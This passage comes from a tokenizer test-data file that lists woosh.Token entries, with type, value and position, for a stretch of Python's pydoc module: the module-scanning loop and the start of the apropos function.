woosh.Token(woosh.STRING, "''", 2220, 44, 2220, 46),
woosh.Token(woosh.OP, ')', 2220, 46, 2220, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2220, 47, 2221, 0),
woosh.Token(woosh.DEDENT, ' ', 2221, 0, 2221, 16),
woosh.Token(woosh.NAME, 'else', 2221, 16, 2221, 20),
woosh.Token(woosh.OP, ':', 2221, 20, 2221, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2221, 21, 2222, 0),
woosh.Token(woosh.INDENT, ' ', 2222, 0, 2222, 20),
woosh.Token(woosh.NAME, 'name', 2222, 20, 2222, 24),
woosh.Token(woosh.OP, '=', 2222, 25, 2222, 26),
woosh.Token(woosh.NAME, '__import__', 2222, 27, 2222, 37),
woosh.Token(woosh.OP, '(', 2222, 37, 2222, 38),
woosh.Token(woosh.NAME, 'modname', 2222, 38, 2222, 45),
woosh.Token(woosh.OP, ')', 2222, 45, 2222, 46),
woosh.Token(woosh.OP, '.', 2222, 46, 2222, 47),
woosh.Token(woosh.NAME, '__doc__', 2222, 47, 2222, 54),
woosh.Token(woosh.NAME, 'or', 2222, 55, 2222, 57),
woosh.Token(woosh.STRING, "''", 2222, 58, 2222, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2222, 60, 2223, 0),
woosh.Token(woosh.NAME, 'desc', 2223, 20, 2223, 24),
woosh.Token(woosh.OP, '=', 2223, 25, 2223, 26),
woosh.Token(woosh.NAME, 'name', 2223, 27, 2223, 31),
woosh.Token(woosh.OP, '.', 2223, 31, 2223, 32),
woosh.Token(woosh.NAME, 'split', 2223, 32, 2223, 37),
woosh.Token(woosh.OP, '(', 2223, 37, 2223, 38),
woosh.Token(woosh.STRING, "'\\n'", 2223, 38, 2223, 42),
woosh.Token(woosh.OP, ')', 2223, 42, 2223, 43),
woosh.Token(woosh.OP, '[', 2223, 43, 2223, 44),
woosh.Token(woosh.NUMBER, '0', 2223, 44, 2223, 45),
woosh.Token(woosh.OP, ']', 2223, 45, 2223, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2223, 46, 2224, 0),
woosh.Token(woosh.NAME, 'name', 2224, 20, 2224, 24),
woosh.Token(woosh.OP, '=', 2224, 25, 2224, 26),
woosh.Token(woosh.NAME, 'modname', 2224, 27, 2224, 34),
woosh.Token(woosh.OP, '+', 2224, 35, 2224, 36),
woosh.Token(woosh.STRING, "' - '", 2224, 37, 2224, 42),
woosh.Token(woosh.OP, '+', 2224, 43, 2224, 44),
woosh.Token(woosh.NAME, 'desc', 2224, 45, 2224, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2224, 49, 2225, 0),
woosh.Token(woosh.NAME, 'if', 2225, 20, 2225, 22),
woosh.Token(woosh.NAME, 'name', 2225, 23, 2225, 27),
woosh.Token(woosh.OP, '.', 2225, 27, 2225, 28),
woosh.Token(woosh.NAME, 'lower', 2225, 28, 2225, 33),
woosh.Token(woosh.OP, '(', 2225, 33, 2225, 34),
woosh.Token(woosh.OP, ')', 2225, 34, 2225, 35),
woosh.Token(woosh.OP, '.', 2225, 35, 2225, 36),
woosh.Token(woosh.NAME, 'find', 2225, 36, 2225, 40),
woosh.Token(woosh.OP, '(', 2225, 40, 2225, 41),
woosh.Token(woosh.NAME, 'key', 2225, 41, 2225, 44),
woosh.Token(woosh.OP, ')', 2225, 44, 2225, 45),
woosh.Token(woosh.OP, '>=', 2225, 46, 2225, 48),
woosh.Token(woosh.NUMBER, '0', 2225, 49, 2225, 50),
woosh.Token(woosh.OP, ':', 2225, 50, 2225, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 2225, 51, 2226, 0),
woosh.Token(woosh.INDENT, ' ', 2226, 0, 2226, 24),
woosh.Token(woosh.NAME, 'callback', 2226, 24, 2226, 32),
woosh.Token(woosh.OP, '(', 2226, 32, 2226, 33),
woosh.Token(woosh.NAME, 'None', 2226, 33, 2226, 37),
woosh.Token(woosh.OP, ',', 2226, 37, 2226, 38),
woosh.Token(woosh.NAME, 'modname', 2226, 39, 2226, 46),
woosh.Token(woosh.OP, ',', 2226, 46, 2226, 47),
woosh.Token(woosh.NAME, 'desc', 2226, 48, 2226, 52),
woosh.Token(woosh.OP, ')', 2226, 52, 2226, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2226, 53, 2227, 0),
woosh.Token(woosh.DEDENT, ' ', 2228, 0, 2228, 8),
woosh.Token(woosh.DEDENT, '', 2228, 8, 2228, 8),
woosh.Token(woosh.DEDENT, '', 2228, 8, 2228, 8),
woosh.Token(woosh.DEDENT, '', 2228, 8, 2228, 8),
woosh.Token(woosh.NAME, 'for', 2228, 8, 2228, 11),
woosh.Token(woosh.NAME, 'importer', 2228, 12, 2228, 20),
woosh.Token(woosh.OP, ',', 2228, 20, 2228, 21),
woosh.Token(woosh.NAME, 'modname', 2228, 22, 2228, 29),
woosh.Token(woosh.OP, ',', 2228, 29, 2228, 30),
woosh.Token(woosh.NAME, 'ispkg', 2228, 31, 2228, 36),
woosh.Token(woosh.NAME, 'in', 2228, 37, 2228, 39),
woosh.Token(woosh.NAME, 'pkgutil', 2228, 40, 2228, 47),
woosh.Token(woosh.OP, '.', 2228, 47, 2228, 48),
woosh.Token(woosh.NAME, 'walk_packages', 2228, 48, 2228, 61),
woosh.Token(woosh.OP, '(', 2228, 61, 2228, 62),
woosh.Token(woosh.NAME, 'onerror', 2228, 62, 2228, 69),
woosh.Token(woosh.OP, '=', 2228, 69, 2228, 70),
woosh.Token(woosh.NAME, 'onerror', 2228, 70, 2228, 77),
woosh.Token(woosh.OP, ')', 2228, 77, 2228, 78),
woosh.Token(woosh.OP, ':', 2228, 78, 2228, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 2228, 79, 2229, 0),
woosh.Token(woosh.INDENT, ' ', 2229, 0, 2229, 12),
woosh.Token(woosh.NAME, 'if', 2229, 12, 2229, 14),
woosh.Token(woosh.NAME, 'self', 2229, 15, 2229, 19),
woosh.Token(woosh.OP, '.', 2229, 19, 2229, 20),
woosh.Token(woosh.NAME, 'quit', 2229, 20, 2229, 24),
woosh.Token(woosh.OP, ':', 2229, 24, 2229, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2229, 25, 2230, 0),
woosh.Token(woosh.INDENT, ' ', 2230, 0, 2230, 16),
woosh.Token(woosh.NAME, 'break', 2230, 16, 2230, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2230, 21, 2231, 0),
woosh.Token(woosh.DEDENT, ' ', 2232, 0, 2232, 12),
woosh.Token(woosh.NAME, 'if', 2232, 12, 2232, 14),
woosh.Token(woosh.NAME, 'key', 2232, 15, 2232, 18),
woosh.Token(woosh.NAME, 'is', 2232, 19, 2232, 21),
woosh.Token(woosh.NAME, 'None', 2232, 22, 2232, 26),
woosh.Token(woosh.OP, ':', 2232, 26, 2232, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2232, 27, 2233, 0),
woosh.Token(woosh.INDENT, ' ', 2233, 0, 2233, 16),
woosh.Token(woosh.NAME, 'callback', 2233, 16, 2233, 24),
woosh.Token(woosh.OP, '(', 2233, 24, 2233, 25),
woosh.Token(woosh.NAME, 'None', 2233, 25, 2233, 29),
woosh.Token(woosh.OP, ',', 2233, 29, 2233, 30),
woosh.Token(woosh.NAME, 'modname', 2233, 31, 2233, 38),
woosh.Token(woosh.OP, ',', 2233, 38, 2233, 39),
woosh.Token(woosh.STRING, "''", 2233, 40, 2233, 42),
woosh.Token(woosh.OP, ')', 2233, 42, 2233, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2233, 43, 2234, 0),
woosh.Token(woosh.DEDENT, ' ', 2234, 0, 2234, 12),
woosh.Token(woosh.NAME, 'else', 2234, 12, 2234, 16),
woosh.Token(woosh.OP, ':', 2234, 16, 2234, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2234, 17, 2235, 0),
woosh.Token(woosh.INDENT, ' ', 2235, 0, 2235, 16),
woosh.Token(woosh.NAME, 'try', 2235, 16, 2235, 19),
woosh.Token(woosh.OP, ':', 2235, 19, 2235, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2235, 20, 2236, 0),
woosh.Token(woosh.INDENT, ' ', 2236, 0, 2236, 20),
woosh.Token(woosh.NAME, 'spec', 2236, 20, 2236, 24),
woosh.Token(woosh.OP, '=', 2236, 25, 2236, 26),
woosh.Token(woosh.NAME, 'pkgutil', 2236, 27, 2236, 34),
woosh.Token(woosh.OP, '.', 2236, 34, 2236, 35),
woosh.Token(woosh.NAME, '_get_spec', 2236, 35, 2236, 44),
woosh.Token(woosh.OP, '(', 2236, 44, 2236, 45),
woosh.Token(woosh.NAME, 'importer', 2236, 45, 2236, 53),
woosh.Token(woosh.OP, ',', 2236, 53, 2236, 54),
woosh.Token(woosh.NAME, 'modname', 2236, 55, 2236, 62),
woosh.Token(woosh.OP, ')', 2236, 62, 2236, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2236, 63, 2237, 0),
woosh.Token(woosh.DEDENT, ' ', 2237, 0, 2237, 16),
woosh.Token(woosh.NAME, 'except', 2237, 16, 2237, 22),
woosh.Token(woosh.NAME, 'SyntaxError', 2237, 23, 2237, 34),
woosh.Token(woosh.OP, ':', 2237, 34, 2237, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2237, 35, 2238, 0),
woosh.Token(woosh.COMMENT, '# raised by tests for bad coding cookies or BOM', 2238, 20, 2238, 67),
woosh.Token(woosh.INDENT, ' ', 2239, 0, 2239, 20),
woosh.Token(woosh.NAME, 'continue', 2239, 20, 2239, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2239, 28, 2240, 0),
woosh.Token(woosh.DEDENT, ' ', 2240, 0, 2240, 16),
woosh.Token(woosh.NAME, 'loader', 2240, 16, 2240, 22),
woosh.Token(woosh.OP, '=', 2240, 23, 2240, 24),
woosh.Token(woosh.NAME, 'spec', 2240, 25, 2240, 29),
woosh.Token(woosh.OP, '.', 2240, 29, 2240, 30),
woosh.Token(woosh.NAME, 'loader', 2240, 30, 2240, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2240, 36, 2241, 0),
woosh.Token(woosh.NAME, 'if', 2241, 16, 2241, 18),
woosh.Token(woosh.NAME, 'hasattr', 2241, 19, 2241, 26),
woosh.Token(woosh.OP, '(', 2241, 26, 2241, 27),
woosh.Token(woosh.NAME, 'loader', 2241, 27, 2241, 33),
woosh.Token(woosh.OP, ',', 2241, 33, 2241, 34),
woosh.Token(woosh.STRING, "'get_source'", 2241, 35, 2241, 47),
woosh.Token(woosh.OP, ')', 2241, 47, 2241, 48),
woosh.Token(woosh.OP, ':', 2241, 48, 2241, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2241, 49, 2242, 0),
woosh.Token(woosh.INDENT, ' ', 2242, 0, 2242, 20),
woosh.Token(woosh.NAME, 'try', 2242, 20, 2242, 23),
woosh.Token(woosh.OP, ':', 2242, 23, 2242, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2242, 24, 2243, 0),
woosh.Token(woosh.INDENT, ' ', 2243, 0, 2243, 24),
woosh.Token(woosh.NAME, 'source', 2243, 24, 2243, 30),
woosh.Token(woosh.OP, '=', 2243, 31, 2243, 32),
woosh.Token(woosh.NAME, 'loader', 2243, 33, 2243, 39),
woosh.Token(woosh.OP, '.', 2243, 39, 2243, 40),
woosh.Token(woosh.NAME, 'get_source', 2243, 40, 2243, 50),
woosh.Token(woosh.OP, '(', 2243, 50, 2243, 51),
woosh.Token(woosh.NAME, 'modname', 2243, 51, 2243, 58),
woosh.Token(woosh.OP, ')', 2243, 58, 2243, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2243, 59, 2244, 0),
woosh.Token(woosh.DEDENT, ' ', 2244, 0, 2244, 20),
woosh.Token(woosh.NAME, 'except', 2244, 20, 2244, 26),
woosh.Token(woosh.NAME, 'Exception', 2244, 27, 2244, 36),
woosh.Token(woosh.OP, ':', 2244, 36, 2244, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2244, 37, 2245, 0),
woosh.Token(woosh.INDENT, ' ', 2245, 0, 2245, 24),
woosh.Token(woosh.NAME, 'if', 2245, 24, 2245, 26),
woosh.Token(woosh.NAME, 'onerror', 2245, 27, 2245, 34),
woosh.Token(woosh.OP, ':', 2245, 34, 2245, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2245, 35, 2246, 0),
woosh.Token(woosh.INDENT, ' ', 2246, 0, 2246, 28),
woosh.Token(woosh.NAME, 'onerror', 2246, 28, 2246, 35),
woosh.Token(woosh.OP, '(', 2246, 35, 2246, 36),
woosh.Token(woosh.NAME, 'modname', 2246, 36, 2246, 43),
woosh.Token(woosh.OP, ')', 2246, 43, 2246, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2246, 44, 2247, 0),
woosh.Token(woosh.DEDENT, ' ', 2247, 0, 2247, 24),
woosh.Token(woosh.NAME, 'continue', 2247, 24, 2247, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2247, 32, 2248, 0),
woosh.Token(woosh.DEDENT, ' ', 2248, 0, 2248, 20),
woosh.Token(woosh.NAME, 'desc', 2248, 20, 2248, 24),
woosh.Token(woosh.OP, '=', 2248, 25, 2248, 26),
woosh.Token(woosh.NAME, 'source_synopsis', 2248, 27, 2248, 42),
woosh.Token(woosh.OP, '(', 2248, 42, 2248, 43),
woosh.Token(woosh.NAME, 'io', 2248, 43, 2248, 45),
woosh.Token(woosh.OP, '.', 2248, 45, 2248, 46),
woosh.Token(woosh.NAME, 'StringIO', 2248, 46, 2248, 54),
woosh.Token(woosh.OP, '(', 2248, 54, 2248, 55),
woosh.Token(woosh.NAME, 'source', 2248, 55, 2248, 61),
woosh.Token(woosh.OP, ')', 2248, 61, 2248, 62),
woosh.Token(woosh.OP, ')', 2248, 62, 2248, 63),
woosh.Token(woosh.NAME, 'or', 2248, 64, 2248, 66),
woosh.Token(woosh.STRING, "''", 2248, 67, 2248, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2248, 69, 2249, 0),
woosh.Token(woosh.NAME, 'if', 2249, 20, 2249, 22),
woosh.Token(woosh.NAME, 'hasattr', 2249, 23, 2249, 30),
woosh.Token(woosh.OP, '(', 2249, 30, 2249, 31),
woosh.Token(woosh.NAME, 'loader', 2249, 31, 2249, 37),
woosh.Token(woosh.OP, ',', 2249, 37, 2249, 38),
woosh.Token(woosh.STRING, "'get_filename'", 2249, 39, 2249, 53),
woosh.Token(woosh.OP, ')', 2249, 53, 2249, 54),
woosh.Token(woosh.OP, ':', 2249, 54, 2249, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2249, 55, 2250, 0),
woosh.Token(woosh.INDENT, ' ', 2250, 0, 2250, 24),
woosh.Token(woosh.NAME, 'path', 2250, 24, 2250, 28),
woosh.Token(woosh.OP, '=', 2250, 29, 2250, 30),
woosh.Token(woosh.NAME, 'loader', 2250, 31, 2250, 37),
woosh.Token(woosh.OP, '.', 2250, 37, 2250, 38),
woosh.Token(woosh.NAME, 'get_filename', 2250, 38, 2250, 50),
woosh.Token(woosh.OP, '(', 2250, 50, 2250, 51),
woosh.Token(woosh.NAME, 'modname', 2250, 51, 2250, 58),
woosh.Token(woosh.OP, ')', 2250, 58, 2250, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2250, 59, 2251, 0),
woosh.Token(woosh.DEDENT, ' ', 2251, 0, 2251, 20),
woosh.Token(woosh.NAME, 'else', 2251, 20, 2251, 24),
woosh.Token(woosh.OP, ':', 2251, 24, 2251, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2251, 25, 2252, 0),
woosh.Token(woosh.INDENT, ' ', 2252, 0, 2252, 24),
woosh.Token(woosh.NAME, 'path', 2252, 24, 2252, 28),
woosh.Token(woosh.OP, '=', 2252, 29, 2252, 30),
woosh.Token(woosh.NAME, 'None', 2252, 31, 2252, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2252, 35, 2253, 0),
woosh.Token(woosh.DEDENT, ' ', 2253, 0, 2253, 16),
woosh.Token(woosh.DEDENT, '', 2253, 16, 2253, 16),
woosh.Token(woosh.NAME, 'else', 2253, 16, 2253, 20),
woosh.Token(woosh.OP, ':', 2253, 20, 2253, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2253, 21, 2254, 0),
woosh.Token(woosh.INDENT, ' ', 2254, 0, 2254, 20),
woosh.Token(woosh.NAME, 'try', 2254, 20, 2254, 23),
woosh.Token(woosh.OP, ':', 2254, 23, 2254, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2254, 24, 2255, 0),
woosh.Token(woosh.INDENT, ' ', 2255, 0, 2255, 24),
woosh.Token(woosh.NAME, 'module', 2255, 24, 2255, 30),
woosh.Token(woosh.OP, '=', 2255, 31, 2255, 32),
woosh.Token(woosh.NAME, 'importlib', 2255, 33, 2255, 42),
woosh.Token(woosh.OP, '.', 2255, 42, 2255, 43),
woosh.Token(woosh.NAME, '_bootstrap', 2255, 43, 2255, 53),
woosh.Token(woosh.OP, '.', 2255, 53, 2255, 54),
woosh.Token(woosh.NAME, '_load', 2255, 54, 2255, 59),
woosh.Token(woosh.OP, '(', 2255, 59, 2255, 60),
woosh.Token(woosh.NAME, 'spec', 2255, 60, 2255, 64),
woosh.Token(woosh.OP, ')', 2255, 64, 2255, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2255, 65, 2256, 0),
woosh.Token(woosh.DEDENT, ' ', 2256, 0, 2256, 20),
woosh.Token(woosh.NAME, 'except', 2256, 20, 2256, 26),
woosh.Token(woosh.NAME, 'ImportError', 2256, 27, 2256, 38),
woosh.Token(woosh.OP, ':', 2256, 38, 2256, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2256, 39, 2257, 0),
woosh.Token(woosh.INDENT, ' ', 2257, 0, 2257, 24),
woosh.Token(woosh.NAME, 'if', 2257, 24, 2257, 26),
woosh.Token(woosh.NAME, 'onerror', 2257, 27, 2257, 34),
woosh.Token(woosh.OP, ':', 2257, 34, 2257, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2257, 35, 2258, 0),
woosh.Token(woosh.INDENT, ' ', 2258, 0, 2258, 28),
woosh.Token(woosh.NAME, 'onerror', 2258, 28, 2258, 35),
woosh.Token(woosh.OP, '(', 2258, 35, 2258, 36),
woosh.Token(woosh.NAME, 'modname', 2258, 36, 2258, 43),
woosh.Token(woosh.OP, ')', 2258, 43, 2258, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2258, 44, 2259, 0),
woosh.Token(woosh.DEDENT, ' ', 2259, 0, 2259, 24),
woosh.Token(woosh.NAME, 'continue', 2259, 24, 2259, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2259, 32, 2260, 0),
woosh.Token(woosh.DEDENT, ' ', 2260, 0, 2260, 20),
woosh.Token(woosh.NAME, 'desc', 2260, 20, 2260, 24),
woosh.Token(woosh.OP, '=', 2260, 25, 2260, 26),
woosh.Token(woosh.NAME, 'module', 2260, 27, 2260, 33),
woosh.Token(woosh.OP, '.', 2260, 33, 2260, 34),
woosh.Token(woosh.NAME, '__doc__', 2260, 34, 2260, 41),
woosh.Token(woosh.OP, '.', 2260, 41, 2260, 42),
woosh.Token(woosh.NAME, 'splitlines', 2260, 42, 2260, 52),
woosh.Token(woosh.OP, '(', 2260, 52, 2260, 53),
woosh.Token(woosh.OP, ')', 2260, 53, 2260, 54),
woosh.Token(woosh.OP, '[', 2260, 54, 2260, 55),
woosh.Token(woosh.NUMBER, '0', 2260, 55, 2260, 56),
woosh.Token(woosh.OP, ']', 2260, 56, 2260, 57),
woosh.Token(woosh.NAME, 'if', 2260, 58, 2260, 60),
woosh.Token(woosh.NAME, 'module', 2260, 61, 2260, 67),
woosh.Token(woosh.OP, '.', 2260, 67, 2260, 68),
woosh.Token(woosh.NAME, '__doc__', 2260, 68, 2260, 75),
woosh.Token(woosh.NAME, 'else', 2260, 76, 2260, 80),
woosh.Token(woosh.STRING, "''", 2260, 81, 2260, 83),
woosh.Token(woosh.NEWLINE, '\r\n', 2260, 83, 2261, 0),
woosh.Token(woosh.NAME, 'path', 2261, 20, 2261, 24),
woosh.Token(woosh.OP, '=', 2261, 25, 2261, 26),
woosh.Token(woosh.NAME, 'getattr', 2261, 27, 2261, 34),
woosh.Token(woosh.OP, '(', 2261, 34, 2261, 35),
woosh.Token(woosh.NAME, 'module', 2261, 35, 2261, 41),
woosh.Token(woosh.OP, ',', 2261, 41, 2261, 42),
woosh.Token(woosh.STRING, "'__file__'", 2261, 42, 2261, 52),
woosh.Token(woosh.OP, ',', 2261, 52, 2261, 53),
woosh.Token(woosh.NAME, 'None', 2261, 53, 2261, 57),
woosh.Token(woosh.OP, ')', 2261, 57, 2261, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2261, 58, 2262, 0),
woosh.Token(woosh.DEDENT, ' ', 2262, 0, 2262, 16),
woosh.Token(woosh.NAME, 'name', 2262, 16, 2262, 20),
woosh.Token(woosh.OP, '=', 2262, 21, 2262, 22),
woosh.Token(woosh.NAME, 'modname', 2262, 23, 2262, 30),
woosh.Token(woosh.OP, '+', 2262, 31, 2262, 32),
woosh.Token(woosh.STRING, "' - '", 2262, 33, 2262, 38),
woosh.Token(woosh.OP, '+', 2262, 39, 2262, 40),
woosh.Token(woosh.NAME, 'desc', 2262, 41, 2262, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2262, 45, 2263, 0),
woosh.Token(woosh.NAME, 'if', 2263, 16, 2263, 18),
woosh.Token(woosh.NAME, 'name', 2263, 19, 2263, 23),
woosh.Token(woosh.OP, '.', 2263, 23, 2263, 24),
woosh.Token(woosh.NAME, 'lower', 2263, 24, 2263, 29),
woosh.Token(woosh.OP, '(', 2263, 29, 2263, 30),
woosh.Token(woosh.OP, ')', 2263, 30, 2263, 31),
woosh.Token(woosh.OP, '.', 2263, 31, 2263, 32),
woosh.Token(woosh.NAME, 'find', 2263, 32, 2263, 36),
woosh.Token(woosh.OP, '(', 2263, 36, 2263, 37),
woosh.Token(woosh.NAME, 'key', 2263, 37, 2263, 40),
woosh.Token(woosh.OP, ')', 2263, 40, 2263, 41),
woosh.Token(woosh.OP, '>=', 2263, 42, 2263, 44),
woosh.Token(woosh.NUMBER, '0', 2263, 45, 2263, 46),
woosh.Token(woosh.OP, ':', 2263, 46, 2263, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2263, 47, 2264, 0),
woosh.Token(woosh.INDENT, ' ', 2264, 0, 2264, 20),
woosh.Token(woosh.NAME, 'callback', 2264, 20, 2264, 28),
woosh.Token(woosh.OP, '(', 2264, 28, 2264, 29),
woosh.Token(woosh.NAME, 'path', 2264, 29, 2264, 33),
woosh.Token(woosh.OP, ',', 2264, 33, 2264, 34),
woosh.Token(woosh.NAME, 'modname', 2264, 35, 2264, 42),
woosh.Token(woosh.OP, ',', 2264, 42, 2264, 43),
woosh.Token(woosh.NAME, 'desc', 2264, 44, 2264, 48),
woosh.Token(woosh.OP, ')', 2264, 48, 2264, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2264, 49, 2265, 0),
woosh.Token(woosh.DEDENT, ' ', 2266, 0, 2266, 8),
woosh.Token(woosh.DEDENT, '', 2266, 8, 2266, 8),
woosh.Token(woosh.DEDENT, '', 2266, 8, 2266, 8),
woosh.Token(woosh.NAME, 'if', 2266, 8, 2266, 10),
woosh.Token(woosh.NAME, 'completer', 2266, 11, 2266, 20),
woosh.Token(woosh.OP, ':', 2266, 20, 2266, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2266, 21, 2267, 0),
woosh.Token(woosh.INDENT, ' ', 2267, 0, 2267, 12),
woosh.Token(woosh.NAME, 'completer', 2267, 12, 2267, 21),
woosh.Token(woosh.OP, '(', 2267, 21, 2267, 22),
woosh.Token(woosh.OP, ')', 2267, 22, 2267, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2267, 23, 2268, 0),
woosh.Token(woosh.DEDENT, '', 2269, 0, 2269, 0),
woosh.Token(woosh.DEDENT, '', 2269, 0, 2269, 0),
woosh.Token(woosh.DEDENT, '', 2269, 0, 2269, 0),
woosh.Token(woosh.NAME, 'def', 2269, 0, 2269, 3),
woosh.Token(woosh.NAME, 'apropos', 2269, 4, 2269, 11),
woosh.Token(woosh.OP, '(', 2269, 11, 2269, 12),
woosh.Token(woosh.NAME, 'key', 2269, 12, 2269, 15),
woosh.Token(woosh.OP, ')', 2269, 15, 2269, 16),
woosh.Token(woosh.OP, ':', 2269, 16, 2269, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2269, 17, 2270, 0),
woosh.Token(woosh.INDENT, ' ', 2270, 0, 2270, 4),
woosh.Token(woosh.STRING, '"""Print all the one-line module summaries that contain a substring."""', 2270, 4, 2270, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 2270, 75, 2271, 0),
woosh.Token(woosh.NAME, 'def', 2271, 4, 2271, 7),
woosh.Token(woosh.NAME, 'callback', 2271, 8, 2271, 16),
woosh.Token(woosh.OP, '(', 2271, 16, 2271, 17),
woosh.Token(woosh.NAME, 'path', 2271, 17, 2271, 21),
woosh.Token(woosh.OP, ',', 2271, 21, 2271, 22),
woosh.Token(woosh.NAME, 'modname', 2271, 23, 2271, 30),
woosh.Token(woosh.OP, ',', 2271, 30, 2271, 31),
woosh.Token(woosh.NAME, 'desc', 2271, 32, 2271, 36),
woosh.Token(woosh.OP, ')', 2271, 36, 2271, 37),
woosh.Token(woosh.OP, ':', 2271, 37, 2271, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2271, 38, 2272, 0),
woosh.Token(woosh.INDENT, ' ', 2272, 0, 2272, 8),
woosh.Token(woosh.NAME, 'if', 2272, 8, 2272, 10),
woosh.Token(woosh.NAME, 'modname', 2272, 11, 2272, 18),
woosh.Token(woosh.OP, '[', 2272, 18, 2272, 19),
woosh.Token(woosh.OP, '-', 2272, 19, 2272, 20),
woosh.Token(woosh.NUMBER, '9', 2272, 20, 2272, 21),
woosh.Token(woosh.OP, ':', 2272, 21, 2272, 22),
woosh.Token(woosh.OP, ']', 2272, 22, 2272, 23),
woosh.Token(woosh.OP, '==', 2272, 24, 2272, 26),
woosh.Token(woosh.STRING, "'.__init__'", 2272, 27, 2272, 38),
woosh.Token(woosh.OP, ':', 2272, 38, 2272, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2272, 39, 2273, 0),
woosh.Token(woosh.INDENT, ' ', 2273, 0, 2273, 12),
woosh.Token(woosh.NAME, 'modname', 2273, 12, 2273, 19),
woosh.Token(woosh.OP, '=', 2273, 20, 2273, 21),
woosh.Token(woosh.NAME, 'modname', 2273, 22, 2273, 29),
woosh.Token(woosh.OP, '[', 2273, 29, 2273, 30),
woosh.Token(woosh.OP, ':', 2273, 30, 2273, 31),
woosh.Token(woosh.OP, '-', 2273, 31, 2273, 32),
woosh.Token(woosh.NUMBER, '9', 2273, 32, 2273, 33),
woosh.Token(woosh.OP, ']', 2273, 33, 2273, 34),
woosh.Token(woosh.OP, '+', 2273, 35, 2273, 36),
woosh.Token(woosh.STRING, "' (package)'", 2273, 37, 2273, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2273, 49, 2274, 0),
woosh.Token(woosh.DEDENT, ' ', 2274, 0, 2274, 8),
woosh.Token(woosh.NAME, 'print', 2274, 8, 2274, 13),
woosh.Token(woosh.OP, '(', 2274, 13, 2274, 14),
woosh.Token(woosh.NAME, 'modname', 2274, 14, 2274, 21),
woosh.Token(woosh.OP, ',', 2274, 21, 2274, 22),
woosh.Token(woosh.NAME, 'desc', 2274, 23, 2274, 27),
woosh.Token(woosh.NAME, 'and', 2274, 28, 2274, 31),
woosh.Token(woosh.STRING, "'- '", 2274, 32, 2274, 36),
woosh.Token(woosh.OP, '+', 2274, 37, 2274, 38),
woosh.Token(woosh.NAME, 'desc', 2274, 39, 2274, 43),
woosh.Token(woosh.OP, ')', 2274, 43, 2274, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2274, 44, 2275, 0),
woosh.Token(woosh.DEDENT, ' ', 2275, 0, 2275, 4),
woosh.Token(woosh.NAME, 'def', 2275, 4, 2275, 7),
woosh.Token(woosh.NAME, 'onerror', 2275, 8, 2275, 15),
woosh.Token(woosh.OP, '(', 2275, 15, 2275, 16),
woosh.Token(woosh.NAME, 'modname', 2275, 16, 2275, 23),
woosh.Token(woosh.OP, ')', 2275, 23, 2275, 24),
woosh.Token(woosh.OP, ':', 2275, 24, 2275, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2275, 25, 2276, 0),
woosh.Token(woosh.INDENT, ' ', 2276, 0, 2276, 8),
woosh.Token(woosh.NAME, 'pass', 2276, 8, 2276, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2276, 12, 2277, 0),
woosh.Token(woosh.DEDENT, ' ', 2277, 0, 2277, 4),
woosh.Token(woosh.NAME, 'with', 2277, 4, 2277, 8),
woosh.Token(woosh.NAME, 'warnings', 2277, 9, 2277, 17),
woosh.Token(woosh.OP, '.', 2277, 17, 2277, 18),
woosh.Token(woosh.NAME, 'catch_warnings', 2277, 18, 2277, 32),
woosh.Token(woosh.OP, '(', 2277, 32, 2277, 33),
woosh.Token(woosh.OP, ')', 2277, 33, 2277, 34),
woosh.Token(woosh.OP, ':', 2277, 34, 2277, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2277, 35, 2278, 0),
woosh.Token(woosh.INDENT, ' ', 2278, 0, 2278, 8),
woosh.Token(woosh.NAME, 'warnings', 2278, 8, 2278, 16),
woosh.Token(woosh.OP, '.', 2278, 16, 2278, 17),
woosh.Token(woosh.NAME, 'filterwarnings', 2278, 17, 2278, 31),
